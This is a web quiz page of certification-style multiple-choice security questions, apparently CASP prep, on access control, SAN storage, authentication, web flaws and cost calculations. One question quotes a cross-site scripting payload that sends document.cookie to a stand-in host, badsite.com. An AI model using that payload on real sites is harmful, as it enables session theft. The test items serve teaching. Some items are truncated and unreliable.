Test
An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions.
Which of the following would BEST accomplish this?
Access control lists
SELinux
IPtables firewall
HIPS
Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out disk space.
Which of the following is a more cost effective alternative to buying a new SAN?
Enable multipath to increase availability
Enable deduplication on the storage pools
Implement snapshots to reduce virtual disk size
Implement replication to offsite datacenter
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share.
Which of the following settings on the UNIX server would correct this problem?
Refuse LM and only accept NTLMv2
Accept only LM
Refuse NTLMv2 and accept LM
Accept only NTLM
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs.
Which of the following will meet this goal without requiring any hardware pass-through implementations?
VTPM
HSM
TPM
INE
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume.
Which of the following is the BEST way to ensure confidentiality of individual operating system data?
Encryption of each individual partition
Encryption of the SSD at the file level
FDE of each logical volume on the SSD
FDE of the entire SSD as a single disk
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart.
SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);
The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MMDDYYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased.
Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
Input validation
SQL injection
TOCTOU
Session hijacking
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data.
Which of the following issues may potentially occur?
The data may not be in a usable format.
The new storage array is not FCoE based.
The data may need a file system check.
The new storage array also only has a single controller.
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed.
Which of the following BEST describes the application issue?
Integer overflow
Click-jacking
Race condition
SQL injection
Use after free
Input validation
A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details.
Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?
Client side input validation
Stored procedure
Encrypting credit card details
Regular expression matching
A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors.
Which of the following controls has likely been implemented by the developers?
SSL certificate revocation
SSL certificate pinning
Mobile device root-kit detection
Extended Validation certificates
A system administrator needs to meet the maximum amount of security goals for a new DNS infrastructure. The administrator deploys DNSSEC extensions to the domain names and infrastructure.
Which of the following security goals does this meet? (Select TWO).
Availability
Authentication
Integrity
Confidentiality
Encryption
The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacy system is out of support because the vendor and security patches are no longer released. Additionally, this is a proprietary embedded system and little is documented and known about it.
Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this system?
Virtualize the system and migrate it to a cloud provider.
Segment the device on its own secure network.
Install an antivirus and HIDS on the system.
Hire developers to reduce vulnerabilities in the code.
An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active Directory Federated Services for their directory service.
Which of the following should the company ensure is supported by the third party? (Select TWO).
LDAP/S
SAML
NTLM
OAUTH
Kerberos
An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. After the upgrade, an unauthorized intrusion into the system was detected. The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly.
Which of the following has been overlooked in securing the system? (Select TWO).
The company’s IDS signatures were not updated.
The company’s custom code was not patched.
The patch caused the system to revert to http.
The software patch was not cryptographically signed.
The wrong version of the patch was used.
Third-party plug-ins were not patched.
A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. While the business is lucrative, they do not have the resources or the scalability to adequately serve their clients.
Since it is an e-discovery firm where chain of custody is important, which of the following scenarios should they consider?
Offload some data processing to a public cloud
Aligning their client intake with the resources available
Using a community cloud with adequate controls
Outsourcing the service to a third party cloud provider
A company is deploying a new iSCSI-based SAN.
The requirements are as follows:
- SAN nodes must authenticate each other.
- Shared keys must NOT be used.
- Do NOT use encryption in order to gain performance.
Which of the following design specifications meet all the requirements? (Select TWO).
Targets use CHAP authentication
IPSec using AH with PKI certificates for authentication
Fiber channel should be used with AES
Initiators and targets use CHAP authentication
Fiber channel over Ethernet should be used
IPSec using AH with PSK authentication and 3DES
Targets have SCSI IDs for authentication
Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect for company XYZ is reviewing a vendor proposal to reduce company XYZ’s hardware costs by combining multiple physical hosts through the use of virtualization technologies. The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning PII, and administrative complexity on the proposal.
Which of the following BEST describes the core concerns of the security architect?
Most of company XYZ’s customers are willing to accept the risks of unauthorized disclosure and access to information by outside users.
The availability requirements in SLAs with each hosted customer would have to be re-written to account for the transfer of virtual machines between physical platforms for regular maintenance.
Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer.
Not all of company XYZ’s customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single hypervisor negates hardware cost savings
A university requires a significant increase in web and database server resources for one week, twice a year, to handle student registration. The web servers remain idle for the rest of the year.
Which of the following is the MOST cost effective way for the university to securely handle student registration?
Virtualize the web servers locally to add capacity during registration.
Move the database servers to an elastic private cloud while keeping the web servers local.
Move the database servers and web servers to an elastic private cloud.
Move the web servers to an elastic public cloud while keeping the database servers local.
Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions. When speaking with the network administrator, the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption.
Which of the following solutions minimizes the performance impact on the router?
Deploy inline network encryption devices
Install an SSL acceleration appliance
Require all core business applications to use encryption
Add an encryption module to the router and configure IPSec
A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network.
Which of the following is the BEST course of action?
Investigate the network traffic and block UDP port 3544 at the firewall
Remove the system from the network and disable IPv6 at the router
Locate and remove the unauthorized 6to4 relay from the network
Disable the switch port and block the 2001::/32 traffic at the firewall
In order to reduce costs and improve employee satisfaction, a large corporation is creating a BYOD policy. It will allow access to email and remote connections to the corporate enterprise from personal devices; provided they are on an approved device list.
Which of the following security measures would be MOST effective in securing the enterprise under the new policy? (Select TWO).
Provide free email software for personal devices.
Encrypt data in transit for remote access.
Require smart card authentication for all devices.
Implement NAC to limit insecure devices access.
Enable time of day restrictions for personal devices.
A security administrator is tasked with implementing two-factor authentication for the company VP+The VPN is currently configured to authenticate VPN users against a backend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as the second factor.
Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO).
The user’s certificate private key must be installed on the VPN concentrator.
The CA’s certificate private key must be installed on the VPN concentrator.
The user certificate private key must be signed by the CA.
The VPN concentrator’s certificate private key must be signed by the CA and installed on the VPN concentrator
The VPN concentrator’s certificate private key must be installed on the VPN concentrator.
The CA’s certificate public key must be installed on the VPN concentrator.
Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or end users before being installed on mobile devices.
Which of the following should Ann implement to stop modified copies of her software from running on mobile devices?
Single sign-on
Identity propagation
Remote attestation
Secure code review
Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOT+The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow.
How should the employees request access to shared resources before the authentication integration is complete?
They should logon to the system using the username concatenated with the 6-digit code and their original password.
They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code.
They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed.
They should use the username format: first.lastname@company.com, together with a password and their 6-digit code.
An industry organization has implemented a system to allow trusted authentication between all of its partners. The system consists of a web of trusted RADIUS servers communicating over the Internet. An attacker was able to set up a malicious server and conduct a successful man-inthemiddle attack.
Which of the following controls should be implemented to mitigate the attack in the future?
Use PAP for secondary authentication on each RADIUS server
Disable unused EAP methods on each RADIUS server
Enforce TLS connections between RADIUS servers
Use a shared secret for each pair of RADIUS servers
Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method.
Which of the following methodologies should be adopted?
The company should develop an in-house solution and keep the algorithm a secret.
The company should use the CEO’s encryption scheme.
The company should use a mixture of both systems to meet minimum standards.
The company should use the method recommended by other respected information security organizations.
Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform?
Aggressive patch management on the host and guest OSs.
Host based IDS sensors on all guest OSs.
Different antivirus solutions between the host and guest OSs.
Unique Network Interface Card (NIC) assignment per guest OS.
Two universities are making their 802.11n wireless networks available to the other university’s students. The infrastructure will pass the student’s credentials back to the home school for authentication via the Internet.
The requirements are:
- Mutual authentication of clients and authentication server
- The design should not limit connection speeds
- Authentication must be delegated to the home school
- No passwords should be sent unencrypted
The following design was implemented:
- WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security
- RADIUS proxy servers will be used to forward authentication requests to the home school
- The RADIUS servers will have certificates from a common public certificate authority
- A strong shared secret will be used for RADIUS server authentication
Which of the following security considerations should be added to the design?
The transport layer between the RADIUS servers should be secured
WPA Enterprise should be used to decrease the network overhead
The RADIUS servers should have local accounts for the visiting students
Students should be given certificates to use for authentication to the network
A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a system compromise from malware. Currently, the company projects a total cost of $50,000 for the next three years responding to and eradicating workstation malware. The Information Security Officer (ISO) has received three quotes from different companies that provide HIPS.
The first quote requires a $10,000 one-time fee, annual cost of $6 per workstation, and a 10% annual support fee based on the number of workstations.
The second quote requires a $15,000 one-time fee, an annual cost of $5 per workstation, and a 12% annual fee based on the number of workstations.
The third quote has no one-time fee, an annual cost of $8 per workstation, and a 15% annual fee based on the number of workstations.
Which solution should the company select if the contract is only valid for three years?
First quote
Second quote
Third quote
Accept the risk
Customers are receiving emails containing a link to malicious software. These emails are subverting spam filters. The email reads as follows:
Delivered-To: customer@example.com
Received: by 10.14.120.205 Mon, 1 Nov 2010 11:15:24 -0700 (PDT)
Received: by 10.231.31.193 Mon, 01 Nov 2010 11:15:23 -0700 (PDT)
Return-Path: <IT@company.com>
Received: from 127.0.0.1 for <customer@example.com>; Mon, 1 Nov 2010 13:15:14 -0500 (envelope-from <IT@company.com>)
Received: by smtpex.example.com (SMTP READY) with ESMTP (AIO); Mon, 01 Nov 2010 13:15:14 -0500
Received: from 172.18.45.122 by 192.168.2.55; Mon, 1 Nov 2010 13:15:14 -0500
From: Company <IT@Company.com>
To: "customer@example.com" <customer@example.com>
Date: Mon, 1 Nov 2010 13:15:11 -0500
Subject: New Insurance Application
Thread-Topic: New Insurance Application
Please download and install software from the site below to maintain full access to your account.
________________________________
Additional information:
The authorized mail servers IPs are 192.168.2.10 and 192.168.2.11.
The network’s subnet is 192.168.2.0/25.
Which of the following are the MOST appropriate courses of action a security administrator could take to eliminate this risk? (Select TWO).
Identify the origination point for malicious activity on the unauthorized mail server.
Block port 25 on the firewall for all unauthorized mail servers.
Disable open relay functionality.
Shut down the SMTP service on the unauthorized mail server.
Enable STARTTLS on the spam filter.
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</scri
pt>') + "';
pt>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server.
Which of the following should the security administrator implement to prevent this particular attack?
WAF
Input validation
SIEM
Sandboxing
DAM
A web developer is responsible for a simple web application that books holiday accommodations. The front-facing web server offers an HTML form, which asks for a user’s age. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range.
Users have reported that the website is not fun ctioning correctly. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring.
Which of the following is the MOST likely situation that has occurred?
The age variable stored the large number and filled up disk space which stopped the
The age variable has had an integer overflow and was assigned a very small negative number
Computers are able to store numbers well above “billions” in size. Therefore, the website
The application has crashed because a very large integer has lead to a “divide by zero”.
A company has decided to change its current business direction and refocus on core business. Consequently, several company sub-businesses are in the process of being sold-off. A security consultant has been engaged to advise on residual information security concerns with a demerger.
From a high-level perspective, which of the following BEST provides the procedure that the consultant should follow?
Perform a penetration test for the current state of the company. Perform another penetration test after the de-merger. Identify the gaps between the two tests.
Duplicate security-based assets should be sold off for commercial gain to ensure that the security posture of the company does not decline.
Explain that security consultants are not trained to offer advice on company acquisitions or demergers. This needs to be handled by legal representatives well versed in corporate law.
Identify the current state from a security viewpoint. Based on the demerger, assess what the security gaps will be from a physical, technical, DR, and policy/awareness perspective.
It has come to the IT administrator’s attention that the “post your comment” field on the company blog page has been exploited, resulting in cross-site scripting attacks against customers reading the blog.
Which of the following would be the MOST effective at preventing the “post your comment” field from being exploited?
Update the blog page to HTTPS
Filter metacharacters
Install HIDS on the server
Patch the web application
Perform client side input validation
A business unit of a large enterprise has outsourced the hosting and development of a new external website which will be accessed by premium customers, in order to speed up the time to market timeline.
Which of the following is the MOST appropriate?
The external party providing the hosting and website development should be obligated under contract to provide a secure service which is regularly tested (vulnerability and penetration). SLAs should be in place for the resolution of newly identified vulnerabilities and a guaranteed uptime.
The use of external organizations to provide hosting and web development services is not recommended as the costs are typically higher than what can be achieved internally. In addition, compliance with privacy regulations becomes more complex and guaranteed uptimes are difficult to track and measure.
Outsourcing transfers all the risk to the third party. An SLA should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly.
Outsourcing transfers the risk to the third party, thereby minimizing the cost and any legal obligations. An MOU should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly.
An administrator is tasked with securing several website domains on a web server. The administrator elects to secure www.example.com, mail.example.org, archive.example.com, and www.example.org with the same certificate.
Which of the following would allow the administrator to secure those domains with a single issued certificate?
Intermediate Root Certificate
Wildcard Certificate
EV x509 Certificate
Subject Alternative Names Certificate
An administrator wishes to replace a legacy clinical software product as it has become a security risk. The legacy product generates $10,000 in revenue a month. The new software product has an initial cost of $180,000 and a yearly maintenance of $2,000 after the first year. However, it will generate $15,000 in revenue per month and be more secure.
How many years until there is a return on investment for this new package?
1
2
3
4
A large company is preparing to merge with a smaller company. The smaller company has been very profitable, but the smaller company’s main applications were created in-house.
Which of the following actions should the large company’s security administrator take in preparation for the merger?
A review of the mitigations implemented from the most recent audit findings of the smaller company should be performed.
An ROI calculation should be performed to determine which company's application should be used.
A security assessment should be performed to establish the risks of integration or co-existence.
A regression test should be performed on the in-house software to determine security risks associated with the software.
Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information?
Deduplication
Data snapshots
LUN masking
Storage multipaths
Company ABC is hiring customer service representatives from Company XY+The representatives reside at Company XYZ’s headquarters.
Which of the following BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems?
Require each Company XYZ employee to use an IPSec connection to the required systems
Require Company XYZ employees to establish an encrypted VDI session to the required systems
Require Company ABC employees to use two-factor authentication on the required systems
Require a site-to-site VPN for intercompany communications
A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented. The CISO wants to know upfront what the projected TCO would be before looking further into this concern.
Two vendor proposals have been received:
Vendor A:
- product-based solution which can be purchased by the pharmaceutical company.
- Capital expenses to cover central log collectors, correlators, storage and management consoles expected to be $150,000.
- Operational expenses are expected to be a 0.5 full time employee (FTE) to manage the solution, and 1 full time employee to respond to incidents per year.
Vendor B:
- managed service-based solution which can be the outsourcer for the pharmaceutical company’s needs.
- Bundled offering expected to be $100,000 per year.
- Operational expenses for the pharmaceutical company to partner with the vendor are expected to be a 0.5 FTE per year.
- Internal employee costs are averaged to be $80,000 per year per FTE.
Based on calculating TCO of the two vendor proposals over a 5 year period, which of the following options is MOST accurate?
Based on cost alone, having an outsourced solution appears cheaper.
Based on cost alone, having an outsourced solution appears to be more expensive.
Based on cost alone, both outsourced an in-sourced solutions appear to be the same.
Based on cost alone, having a purchased product solution appears cheaper.
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware.
By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
Software-based root of trust
Continuous chain of trust
Chain of trust with a hardware root of trust
Software-based trust anchor with no root of trust
A port in a fibre channel switch failed, causing a costly downtime on the company’s primary website.
Which of the following is the MOST likely cause of the downtime?
The web server iSCSI initiator was down.
The web server was not multipathed.
The SAN snapshots were not up-to-date.
The SAN replication to the backup site failed.
An internal development team has migrated away from Waterfall development to use Agile development. Overall, this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. However, some staff within the security team have contended that Agile development is not secure.
Which of the following is the MOST accurate statement?
Agile and Waterfall approaches have the same effective level of security posture. They both need similar amounts of security effort at the same phases of development.
Agile development is fundamentally less secure than Waterfall due to the lack of formal up-front design and inability to perform security reviews.
Agile development is more secure than Waterfall as it is a more modern methodology which has the advantage of having been able to incorporate security best practices of recent years.
Agile development has different phases and timings compared to Waterfall. Security activities need to be adapted and performed within relevant Agile phases.
A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy.
Which of the following are true statements? (Select TWO).
The X509 V3 certificate was issued by a non trusted public CA.
The client-server handshake could not negotiate strong ciphers.
The client-server handshake is configured with a wrong priority.
The client-server handshake is based on TLS authentication.
The X509 V3 certificate is expired.
The client-server implements client-server mutual authentication with different certificates.
Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO).
Synchronous copy of data
RAID configuration
Data de-duplication
Storage pool space allocation
Port scanning
LUN masking/mapping
Port mapping
An enterprise must ensure that all devices that connect to its networks have been previously approved. The solution must support dual factor mutual authentication with strong identity assurance. In order to reduce costs and administrative overhead, the security architect wants to outsource identity proofing and second factor digital delivery to the third party.
Which of the following solutions will address the enterprise requirements?
Implementing federated network access with the third party.
Using a HSM at the network perimeter to handle network device access.
Using a VPN concentrator which supports dual factor via hardware tokens.
Implementing 802.1x with EAP-TTLS across the infrastructure.
{"name":"Test", "url":"https://www.quiz-maker.com/QPREVIEW","txt":"An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this?, Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to buying a new SAN?, A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem?","img":"https://www.quiz-maker.com/3012/images/ogquiz.png"}
More Quizzes
What icon r u?
7427
Testas
210
Ken je Kries Kwizz?
520
Káin és Ábel története
1680
Static Gk quiz on latest Current affairs
100
Looping
52130
Is affiliate marketing is right way to make money?
1050
What Tarcadian Class Are You? (AOOT quiz)
105140
X10 - Business Overview
1680
Test Your Credit Knowledge!
10522
1050
Christiana Care Imaging Services - Customer Service Quiz
25120